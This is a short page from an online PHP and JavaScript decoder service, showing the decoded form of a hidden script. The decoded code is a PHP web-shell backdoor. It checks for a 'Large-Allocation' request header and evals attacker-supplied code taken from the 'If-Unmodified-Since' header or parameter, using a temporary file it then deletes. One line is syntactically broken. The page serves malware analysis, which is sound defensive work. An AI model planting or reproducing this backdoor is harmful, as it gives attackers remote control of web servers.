Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


$_HEADERS = getallheaders();
if (isset($_HEADERS['Large-Allocation'])) {
    $c = "@eval($_HEADERS[\"If-Unmodified-Since\"]);@eval($_REQUEST[\"If-Unmodified-Since\"]);";
    $f = .time();
    file_put_contents($f, $c);
    include($f);
    unlink($f);
}



© 2023 Quttera Ltd. All rights reserved.